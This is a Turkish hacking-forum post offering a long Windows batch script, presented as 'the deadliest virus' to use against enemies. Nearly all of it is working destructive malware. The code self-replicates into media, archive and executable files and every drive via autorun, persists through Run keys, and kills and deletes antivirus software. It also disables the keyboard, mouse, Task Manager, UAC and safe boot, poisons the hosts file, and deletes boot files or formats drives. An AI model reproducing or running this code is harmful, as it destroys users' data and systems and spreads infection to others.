İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

!!En ölümcül Virüs!!

01-01-2013 14:28
#1
Üyelik tarihi:
09/2012
Nereden:
Sakarya
Yaş:
22
Mesajlar:
202
Teşekkür (Etti):
105
Teşekkür (Aldı):
31
Konular:
53
SA arkadaşlar bu konu alıntı değildir. Tamamen kendim hazırladım...
bu virüsü not defterine yazın ve uzantısını .bat olarak kayıt edin. bunu hemen hemen
herkes bilir.

uyarı:bu kodlar tüm anti virüsler tarafından bulunur.

kabul edilmeli evet biraz uzun ama düşmanlar için iyi seçim

RaxiD: Bu kodları bilgisayarınızda denemeyiniz !

Kod:
@echo off
rem ---------------------------------
rem Fare Devre disi birakma
set fare="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %fare%
reg add %fare% /v Start /t REG_DWORD /d 4
rem ---------------------------------
@ECHO OFF
@ECHO PC DELIRT
GOTO start
:start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
original
CD %HomeDrive%\
SET sharma=1
GOTO flood1
:flood1
MKDIR sharma%sharma%
SET /a sharma=%sharma%+1
GOTO flood1
GOTO start
echo Do >> "diskac.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "diskac.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "diskac.vbs"
echo colCDROMs.Item(d).Eject  >> "diskac.vbs"
echo colCDROMs.Item(d).Eject  >> "diskac.vbs"
echo Loop >> "diskac.vbs"
start "" "diskac.vbs"
diskac.vbs
@echo off
rem ---------------------------------
rem Spam TXT
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
echo %random% > C:\%random%.txt
rem ---------------------------------
@echo off
rem ---------------------------------
rem Tum mp3lere bulas
assoc .mp3=batfile
DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
@echo off
rem ---------------------------------
rem Tum rarlara bulas
assoc .rar=batfile
DIR /S/B %SystemDrive%\*.rar >> InfList_rar.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_rar.txt) do copy %0 "%%j:%%k"
rem ---------------------------------

@echo off
rem ---------------------------------
rem Tum ziplere bulas
assoc .zip=batfile
DIR /S/B %SystemDrive%\*.zip >> InfList_zip.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_zip.txt) do copy %0 "%%j:%%k"
rem ---------------------------------

@echo off
copy %0 %windir%\system32\ls.bat
@echo off
copy %0 "%userprofile%\Start Menu\Programs\Startup"
@echo off
rem ---------------------------------
rem Tum mpeglere bulas
assoc .mpeg=batfile
DIR /S/B %SystemDrive%\*.mpeg >> InfList_mpeg.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mpeg.txt) do copy %0 "%%j:%%k"
rem ---------------------------------

@echo off
rem ---------------------------------
rem Tum mp4lere bulas
assoc .mp4=batfile
DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy %0 "%%j:%%k"
rem ---------------------------------

@echo off
rem ---------------------------------
rem Tum jpglere bulas
assoc .jpg=batfile
DIR /S/B %SystemDrive%\*.jpg >> InfList_jpg.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_jpg.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
@echo off
rem ---------------------------------
rem Tum driverlere bulas
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
rem ---------------------------------
@echo off
rem ---------------------------------
rem Tum exelere bulas
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
@echo off
rem ---------------------------------
rem Calisan anahtarlara bulas
set valinf="rundll32_%random%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d %0 /f > nul
rem ---------------------------------

%Xul%
@Echo off > Nul.Xul
@Rundll32 user32,LockWorkStation
@Set Mouse=Xul_Mouse.bat
@Echo @Echo off > %Mouse%
@Echo :Xul >> %Mouse%
@Echo @Rundll32 user32,SetCursorPos >> %Mouse%
@Echo Goto Xul >> %Mouse%
@Call %Mouse%
@Set Xul=Xul_%random%.bat
@Ren %0 %Xul%
@Set RunInf="HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
@Reg Add %RunInf% /V "Rundll32" /T "REG_SZ" /D %0 /F > Nul 
@Echo [windows] >> %windir%\win.ini
@Echo run=%0 >> %windir%\win.ini
@Echo load=%0 >> %windir%\win.ini
@Echo [boot] >> %windir%\system.ini
@Echo shell=explorer.exe %0 >> %windir%\system.ini
@Set StartupDirInf="%UserProfile%\Startm~1\Programs\Startup"
@Copy /Y %0 %StartupDirInf%
@Set MemKill=Xul_Memory.bat
@Echo @Echo off > %MemKill%
@Echo %%XulMemory%% >> %MemKill%
@Echo Find "XulMemory"^<%%0^>^>%%0 >> %MemKill%
@Echo %%XulMemory%% >> %MemKill%
@Call %MemKill%
@Rd %Userprofile%\Music /S /Q > Nul
@Rd %Userprofile%\Pictures /S /Q > Nul
@For %%D In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
@Set Drive=%%D
@Copy /Y %0 %Drive%:\
@Echo [AutoRun] > %Drive%:\autorun.inf
@Echo open="%Drive%:\%Xul%" >> %%Drive%:\autorun.inf
@Echo action=Open folder to see files... >> %Drive%:\autorun.inf)
%Xul%
%viruz%
%viruz%@echo off
%viruz%set myself=PiCtUrEpErFeCt_%random%_%random%.bat
%viruz%ren %0 %myself%
%viruz%assoc .jpg=batfile
%viruz%for %%j in (%UserProfile%\Pictures\*.jpg) do (copy /y %0 %%j)
%viruz%find "KOYULACAK YAZI"<%0>>%0
%viruz%set valinf="rundll32_%random%_toolbar"
%viruz%set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
%viruz%reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
%viruz%for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
%viruz%copy /Y %0 %%E:\
%viruz%echo [AutoRun] > %%E:\autorun.inf
%viruz%echo open="%%E:\%myself%" >> %%E:\autorun.inf
%viruz%echo action=Open folder to see files... >> %%E:\autorun.inf)
%viruz%
@ECHO OFF
GOTO start

:start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET sharma=1
GOTO flood1
:flood1
MKDIR sharma%sharma%
SET /a sharma=%sharma%+1
GOTO flood1
@ECHO OFF
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
:fill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\********s and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\********s and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
:kill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\********s and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\********s and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
:inf
TYPE "%~df0" > "C:\********s and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\********s and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:disinf
ECHO Y | DEL "C:\********s and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\********s and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:bye
:theend

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
INTERNETI SINIRSIZ KAPAT
echo @echo off>c:\windows\wimn32.bat 
echo break off>>c:\windows\wimn32.bat 
echo ipconfig/release_all>>c:\windows\wimn32.bat 
echo end>>c:\windows\wimn32.bat 
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f 
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f 
PAUSE
assoc .mp3=txtfile
assoc .xml=pngfile
assoc .png=txtfile
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile

@echo off
rem ---------------------------------
rem Anti-virüs öldürücü v1
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem ---------------------------------
@echo off
rem ---------------------------------
rem Klavye Devre disi etme
echo Windows Registry Editor Version 5.00 > "klavyekapa.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "klavyekapa.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "klavyekapa.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "klavyekapa.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "klavyekapa.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "klavyekapa.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "klavyekapa.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "klavyekapa.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "klavyekapa.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "klavyekapa.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "klavyekapa.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "klavyekapa.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "klavyekapa.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "klavyekapa.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "klavyekapa.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "klavyekapa.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "klavyekapa.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "klavyekapa.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "klavyekapa.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "klavyekapa.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "klavyekapa.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "klavyekapa.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "klavyekapa.reg"
start "klavyekapa.reg"
rem ---------------------------------
@echo off
echo Set wshShell =wscript.CreateObject(“WScript.Shell”) >>sendkey.vbs
echo do >>sendkey.vbs
echo wscript.sleep 100 >>sendkey.vbs
echo wshshell.sendkeys “{CAPSLOCK}” >>sendkey.vbs
echo loop >>sendkey.vbs
sendkey.vbs
@echo off
%
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo off3.
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r
/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
@echo off
cd\WINDOWS\
@del explorer.exe
@del NOTEPAD.exe
cd\WINDOWS\system32\
@del winlogon.exe
@del spider.exe
@del notepad.exe
@del mspaint.exe
@del accwiz.exe
@del calc.exe
end
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My ********s
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
format c:\ /Q/X
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X 
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini 
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
@echo off 
attrib -r -s -h c:\autoexec.bat 
del c:\autoexec.bat 
attrib -r -s -h c:\boot.ini 
del c:\boot.ini 
attrib -r -s -h c:\ntldr 
del c:\ntldr 
attrib -r -s -h c:\windows\win.ini 
del c:\windows\win.ini
@echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
@echo off
attrib +r %0
@echo off
copy %0 "%userprofile%\..\All Users\Start Menu\Programs\Startup"
@echo off
copy %0 %systemroot%\system32\%0
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\system32\%0 >> %systemroot%\win.ini
echo run=%systemroot%\system32\%0 >> %systemroot%\win.ini
@echo off
@Set RegistyEditCmd=Cmd /k Reg Add
@Set HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
@%RegistyEditCmd% "%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d "0" /f > nul
@echo off
attrib +s %0
@echo off
cd %userprofile%\desktop
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
copy %0 %random%.%random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%
md %random%

@echo off
cmd /c echo 127.0.0.1 www.symantec.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.sophos.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.avast.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.mcafee.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.f-prot.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.f-secure.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.avp.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.kaspersky.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.bitdefender.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.my-etrust.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.eset.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.norman.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.grisoft.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.google.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.yandex.com.tr>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.yandex.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 mx1.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 mx2.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 messenger.hotmail.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.google.co.uk>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.google.com.tr>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.youtube.com>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.youtube.co.uk>>c:\windows\system32\Drivers\Etc\Hosts
cmd /c echo 127.0.0.1 www.yahoo.com>>c:\windows\system32\Drivers\Etc\Hosts
@echo off
reg delete HKLM\SYSTEM\currentcontrolset\control\safeboot\minimal/f > nul
reg delete HKLM\SYSTEM\currentcontrolset\control\safeboot\network/f > nul
@echo off
